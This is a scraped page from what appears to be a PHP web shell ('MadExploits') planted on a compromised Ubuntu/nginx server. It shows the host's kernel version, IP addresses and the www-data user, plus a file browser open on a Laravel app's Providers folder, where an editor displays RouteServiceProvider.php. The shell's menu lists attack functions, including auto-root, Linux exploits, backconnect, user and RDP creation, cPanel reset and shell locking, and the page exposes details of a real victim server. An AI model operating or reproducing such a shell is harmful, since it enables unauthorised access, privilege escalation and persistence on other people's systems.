Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
app /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
AppServiceProvider.php
1.59
KB
-rw-rw-r--
AuthServiceProvider.php
585
B
-rw-rw-r--
BroadcastServiceProvider.php
380
B
-rw-rw-r--
ComposerServiceProvider.php
533
B
-rw-rw-r--
EventServiceProvider.php
685
B
-rw-rw-r--
LogServiceProvider.php
510
B
-rw-rw-r--
NotificationServiceProvider.ph...
525
B
-rw-rw-r--
RouteServiceProvider.php
2.34
KB
-rw-rw-r--
SidebarServiceProvider.php
492
B
-rw-rw-r--
SloganServiceProvider.php
493
B
-rw-rw-r--
SloganServiceProvider_old.php
468
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteServiceProvider.php
<?php namespace App\Providers; use Illuminate\Cache\RateLimiting\Limit; use Illuminate\Foundation\Support\Providers\RouteServiceProvider as ServiceProvider; use Illuminate\Http\Request; use Illuminate\Support\Facades\RateLimiter; use Illuminate\Support\Facades\Route; class RouteServiceProvider extends ServiceProvider { /** * The path to the "home" route for your application. * * This is used by Laravel authentication to redirect users after login. * * @var string */ public const HOME = '/home'; /** * The controller namespace for the application. * * When present, controller route declarations will automatically be prefixed with this namespace. * * @var string|null */ // protected $namespace = 'App\\Http\\Controllers'; /** * Define your route model bindings, pattern filters, etc. * * @return void */ /** public function boot() * { * $this->configureRateLimiting(); * $this->routes(function () { * Route::prefix('api') * ->middleware('api') * ->namespace($this->namespace) * ->group(base_path('routes/api.php')); * Route::middleware('web') * ->namespace($this->namespace) * ->group(base_path('routes/web.php')); }); } */ /** * Configure the rate limiters for the application. * * @return void */ protected function configureRateLimiting() { RateLimiter::for('api', function (Request $request) { return Limit::perMinute(60)->by(optional($request->user())->id ?: $request->ip()); }); } /** * This namespace is applied to your controller routes. * * In addition, it is set as the URL generator's root namespace. * * @var string */ protected $namespace = 'App\Http\Controllers'; // need to add in Laravel 8 public function boot() { $this->configureRateLimiting(); $this->routes(function () { Route::prefix('api') ->middleware('api') ->namespace($this->namespace) // need to add in Laravel 8 ->group(base_path('routes/api.php')); Route::middleware('web') ->namespace($this->namespace) // need to add in Laravel 8 ->group(base_path('routes/web.php')); }); } }
Close